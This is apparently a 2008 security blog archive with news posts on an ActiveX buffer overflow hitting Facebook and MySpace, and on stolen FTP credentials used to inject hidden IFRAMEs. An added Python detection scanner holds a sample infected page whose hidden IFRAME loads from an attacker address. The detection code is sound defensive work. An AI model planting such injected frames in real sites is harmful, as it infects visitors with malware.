Archive for criminals

Buffer Overflows Scupper Facebook & MySpace

Posted in Staying safe on February 28, 2008 by chopperarris

Word on the street is that buffer overflows are at the heart of a series of hacks against Facebook and MySpace.

I tapped a man in a white coat at Fortify Software and he said a buffer overflow enabled hackers to exploit the Aurigma ActiveX image uploading software used by these two, and other, social networking sites.

He said the bad news is that this exploit has been bundled into a hacker toolkit currently offered for download on several Chinese-language hacker sites, meaning that novices, and not just professional hackers, have been able to stage these attacks. The good news is that anyone out of college won’t be affected.

Criminal hackers now view these social networking sites as their best target. Part of the reason is that the sites are designed to be usable by ‘unsophisticated’ consumers. You callin’ me thick? That lowers the barrier to entry for an attacker, because such users are more likely to click on a link that leads them to malware.

Social networking sites can no longer restrict their concerns solely to their own security practices, but must now take in the practices of their suppliers as well. Had Facebook and MySpace required Aurigma to provide proof of a code audit before sourcing the plug-in, this latest security issue might well have been caught before it shipped.

FTP Hack Attack!

Posted in Staying safe on February 27, 2008 by chopperarris

A database containing more than 8,700 harvested FTP account credentials, each with username, password and server address, has been uncovered. These stolen credentials let criminals log in to the servers and automatically plant crimeware that infects the users visiting them. We’re all gonna die!

Among the stolen accounts are those of Fortune-level global companies in a wide range of industries, including manufacturing, telecom, media, online retail and IT, as well as government agencies. They include some of the world’s top 100 domains as ranked by Alexa.com.

The plot thickens. Details have emerged of the workings of an insidious new application, purpose-built to abuse and trade the stolen FTP credentials of legitimate companies around the world. Its trading interface grades each stolen account by the country in which the FTP server resides and by the Google page ranking of the compromised site.

This lets the criminals price the compromised credentials for resale to other criminals, or aim their own attacks at the more prominent sites. The application also uses the stored credentials to log in and automatically inject IFRAME tags into the Web pages on the compromised server, so that every visitor’s browser silently loads content from a host the criminals control.
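That injected IFRAME is also the defender’s cleanest detection point: to keep the site looking normal it is almost always sized to zero or hidden with CSS, and it points off-site. The scanner below is an added example written for this post, not code from the original article or from any vendor named in it; the allowed-host list, the attacker address 198.51.100.7 and the sample pages are constructed for the illustration.

```python
"""Scan HTML for injected hidden IFRAMEs.

Added example, not code from the original post or from any vendor named in it.
After an FTP account is stolen the pages on the server are edited to load a
frame from an attacker-controlled host; the frame is made invisible so the
site keeps looking normal. This scanner flags frames by off-site destination,
zero/one-pixel size and CSS hiding. Hosts and pages below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately frames (assumed for the example).
ALLOWED_HOSTS = {"example.com", "www.example.com"}

_HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _is_tiny(value):
    """True for width/height values such as '0', '1', '0px' or '1px'."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe>, wherever it sits in the file
    (injected frames often land after </html>, which this parser still sees)."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":            # HTMLParser lower-cases tag names
            self.iframes.append(dict(attrs))


def classify_iframe(attrs, allowed_hosts=ALLOWED_HOSTS):
    """Return the reasons a frame looks injected; an empty list means benign."""
    reasons = []
    host = urlparse(attrs.get("src") or "").hostname   # handles '//host/x' too
    if host and host.lower() not in allowed_hosts:
        reasons.append(f"off-site src {host}")
    if _is_tiny(attrs.get("width")) or _is_tiny(attrs.get("height")):
        reasons.append("zero/one-pixel dimensions")
    if _HIDDEN_CSS.search(attrs.get("style") or ""):
        reasons.append("hidden via CSS")
    return reasons


def scan_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return [(src, reasons), ...] for every suspicious iframe in html."""
    parser = _IframeCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for attrs in parser.iframes:
        reasons = classify_iframe(attrs, allowed_hosts)
        if reasons:
            findings.append((attrs.get("src"), reasons))
    return findings


# Constructed sample pages: a clean one, and the same page with a frame
# appended after </html>, the way an automated FTP injector would do it.
CLEAN_PAGE = """<html><body>
<h1>Product catalogue</h1>
<iframe src="http://www.example.com/promo.html" width="300" height="200"></iframe>
</body></html>
"""
INFECTED_PAGE = CLEAN_PAGE + (
    '<IFRAME SRC="http://198.51.100.7/in.cgi?3" WIDTH=0 HEIGHT=0 '
    'STYLE="visibility:hidden"></IFRAME>\n'
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, scan_html(page))
```

Run it over the document root after any FTP login you cannot account for, and diff against a known-good copy of the site where one exists: the heuristics will also flag a legitimate hidden third-party frame, so the allowed-host list needs to reflect what the site really embeds.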

Software-as-a-Service has been evolving for some time, but until now it had been applied only to legitimate applications. With this trading application, cybercriminals have an instant ‘solution’ to their ‘problem’ of obtaining FTP credentials and so infecting both the legitimate Web sites and their unsuspecting visitors, all at the push of a button.